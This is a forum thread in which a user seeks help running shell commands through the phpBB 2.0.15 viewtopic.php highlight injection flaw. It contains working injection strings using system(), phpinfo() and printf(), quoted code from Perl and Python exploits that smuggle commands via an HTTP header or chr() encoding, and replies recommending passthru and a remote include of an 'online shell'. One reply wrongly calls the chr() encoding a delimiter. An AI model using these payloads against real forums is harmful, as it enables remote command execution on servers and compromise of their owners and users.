[crock]

Hi,

I'm trying to understand the exploits on the phpBB 2.0.15 "viewtopic.php" vulnerability.

I figured out several commands myself like:

&highlight='.system(logname).' where logname is just a unix command
or
&highlight='.phpinfo().'
or
&highlight='.printf(test).'

which are just basic php commands.
But, if I try a command with spaces like:

&highlight='.system(echo hello world).'

I get nothing. It is also changed to
&highlight='.system(echo%20hello%20world).' But nothing seems to happen.
I understand there must be a way to convert these spaces to something that will work.
I've tried reading both shell-exploits (a perl version and a python version),
but can't figure it out:

from the perl exploit:

� my $cmd � �= "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
 � my $string �= "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
 � � � � � � � � � "Host: $server\nPHP: $cmd\n\n\n\n";
 � my $socket = IO::Socket::INET->new(PeerAddr => $server,
 � � � � � � � PeerPort => $port,
 � � � � � � � Proto � �=> "tcp",
 � � � � � � � Type � � => SOCK_STREAM)
 � � � � � � � or die "can't connect to: $server : $@\n";
 � print $socket $string;

which does something with the HTTP_PHP variable

from the python exploit:

def makecmd(cmd):
return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))

wich does something with the chr(%d) .

But because I have no experience with perl or python, I can't seem to figure out how the exploits convert the spaces to something that will work.

Could somebody help.

thx,

[pita]

its just a delimiter, with this he know that what the exploit have to show is between the delimiter.
and of course if the delimiter is not here, the exploit know that the target wasn't exploited.

[crock]

ah, so the chr(%d) is his delimiter, interesting...

but the question was, how do I use spaces in commands?
How can I make the command:

&highlight='.system(echo hello world).'

work?

[pr0t0type]

You'll want to enclose your command inside either ' or " quotes i'd imagine. The php system() command takes 2 arguments, only the first one is usefull for a command so the spaces will probably be a syntax error.

&highlight='.system("echo hello world").'

[stay]

system() has a return value, it's not like phpinfo() which gives automatically something out. so system() wil never output you something on the screen without extra code ;)

http://php.net/manua...tion.system.php

[Nick W]

stay is absolutely right. when you do that, you won't get a result, you'll just get maybe 0 or 1 telling you if it worked or not.

[brOmstar]

simply use passthru instead of system to get the output..

[ShoCK FX]

or use include instead and use your online shell :rolleyes: